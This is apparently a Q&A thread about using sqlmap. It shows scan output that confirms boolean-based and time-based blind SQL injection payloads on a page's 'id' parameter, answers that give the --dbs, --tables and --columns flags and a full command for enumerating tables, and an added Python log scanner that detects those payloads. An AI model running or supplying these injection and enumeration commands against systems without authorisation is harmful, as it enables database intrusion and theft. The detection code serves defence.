8

I've just started using sqlmap to test for possible SQL injection attacks.

I have got a website which is vulnerable:

    C:\Python27>python xxx\sqlmap\sqlmap.py -u http://www.example.com/page.php?id=1
    [*] starting at: 19:33:27
    [19:33:27] [INFO] using 'xxx\session' as session file
    [19:33:27] [INFO] testing connection to the target url
    [19:33:31] [INFO] testing if the url is stable, wait a few seconds
    [19:33:33] [INFO] url is stable
    [19:33:33] [INFO] testing if GET parameter 'id' is dynamic
    [19:33:33] [INFO] confirming that GET parameter 'id' is dynamic
    [19:33:34] [INFO] GET parameter 'id' is dynamic
    [19:33:35] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: MySQL)
    [19:33:35] [INFO] testing sql injection on GET parameter 'id'
    [19:33:35] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
    [19:33:39] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
    [19:33:39] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
    [19:33:39] [INFO] testing 'MySQL > 5.0.11 stacked queries'
    [19:33:40] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
    [19:34:40] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable
    [19:34:40] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
    [19:34:44] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
    GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N] y
    sqlmap identified the following injection points with a total of 29 HTTP(s) requests:
    ---
    Place: GET
    Parameter: id
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: id=1 AND 3404=3404
        Type: AND/OR time-based blind
        Title: MySQL > 5.0.11 AND time-based blind
        Payload: id=1 AND SLEEP(5)
    ---
    [19:34:55] [INFO] the back-end DBMS is MySQL
    web application technology: PHP 5.2.15
    back-end DBMS: MySQL 5.0.11
    [19:34:55] [WARNING] HTTP error codes detected during testing: 403 (Forbidden) - 21 times
    [19:34:55] [INFO] Fetched data logged to text files under 'xxx\output\www.example.com'
    [*] shutting down at: 19:34:55

Now I would like to find out whether I can, for example, see all the tables in the database.

What do I have to type in the command line to check this?

3
  • 1
    Just use Havij or Pangolin. You should try to read a manual, or to type --help for help with a command. This is why I'm also downvoting you.
    – atdre
    Commented Jun 13, 2011 at 19:43
  • Why the profanity? I just didn't realize that the options are called enumeration. ...
    – PeeHaa
    Commented Jun 13, 2011 at 19:48
  • 3
    Whilst you are correct that this was pretty much an RTFM type question, please stick to the FAQ - be nice. Also such a comment (but nicer) would be more appropriate as a comment, not an answer. Besides, sometimes it is hard to find something when you don't know what you're looking for....
    – AviD
    Commented Jun 14, 2011 at 0:35
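
A defender's view of the scan shown in the question, as an added example that is not part of the original post or of sqlmap: a small Python scanner that flags, in a web access log, the two payload shapes sqlmap reported (`AND 3404=3404` and `AND SLEEP(5)`). The log lines, the client IP addresses and the combined-log layout are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (not from the post); documentation-range IPs.
SAMPLE_LOG = """\
198.51.100.7 - - [13/Jun/2011:19:33:33 +0000] "GET /page.php?id=1 HTTP/1.1" 200 5120
198.51.100.7 - - [13/Jun/2011:19:33:35 +0000] "GET /page.php?id=1%20AND%203404%3D3404 HTTP/1.1" 200 5120
198.51.100.7 - - [13/Jun/2011:19:33:37 +0000] "GET /page.php?id=1%20AND%203404%3D3404 HTTP/1.1" 403 199
198.51.100.7 - - [13/Jun/2011:19:33:40 +0000] "GET /page.php?id=1%20AND%20SLEEP(5) HTTP/1.1" 200 5120
203.0.113.20 - - [13/Jun/2011:19:40:02 +0000] "GET /page.php?id=42 HTTP/1.1" 200 4977
203.0.113.20 - - [13/Jun/2011:19:40:09 +0000] "GET /search.php?q=salt+and+pepper HTTP/1.1" 200 2210
"""

LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" (\d{3}) ')

# One rule per technique named in the sqlmap report quoted in the question.
RULES = {
    "boolean-based blind": re.compile(r"\b(?:AND|OR)\s+\d+\s*=\s*\d+", re.I),
    "time-based blind": re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I),
}

def scan(log_text):
    """Return {client_ip: {"hits": {rule: [(param, value)]}, "forbidden": int}}."""
    report = defaultdict(lambda: {"hits": defaultdict(list), "forbidden": 0})
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, target, status = m.groups()
        matched = False
        # parse_qsl percent-decodes values, so encoded payloads hit the same rules
        for param, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            for name, rx in RULES.items():
                if rx.search(value):
                    report[ip]["hits"][name].append((param, value))
                    matched = True
        # 403s on probe requests mirror the "403 (Forbidden)" warning in the report
        if matched and status == "403":
            report[ip]["forbidden"] += 1
    # Only clients with at least one rule hit appear in the result
    return {ip: {"hits": dict(r["hits"]), "forbidden": r["forbidden"]}
            for ip, r in report.items()}

if __name__ == "__main__":
    for ip, r in scan(SAMPLE_LOG).items():
        print(ip, {k: len(v) for k, v in r["hits"].items()}, "403s:", r["forbidden"])
```

The ordinary query `q=salt+and+pepper` is not flagged, because the boolean rule requires a numeric comparison after `AND`/`OR`.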

2 Answers

14

What you are asking to find out is called enumeration.

Reading the SQLMap manual under the enumeration topic provides me with the following information:

  • --dbs for databases
  • --tables for tables
  • --columns for columns

There is also a lot of other good information in the manual, so I suggest reading over it if you have more questions about flags and parameters the tool takes.

I've added a blog post about enumeration with SQLMap here: http://www.securesolutions.no/enumeration-with-sqlmap/

    0

    oh you're so close, it's

    ./sqlmap.py -u http://example.com --tables
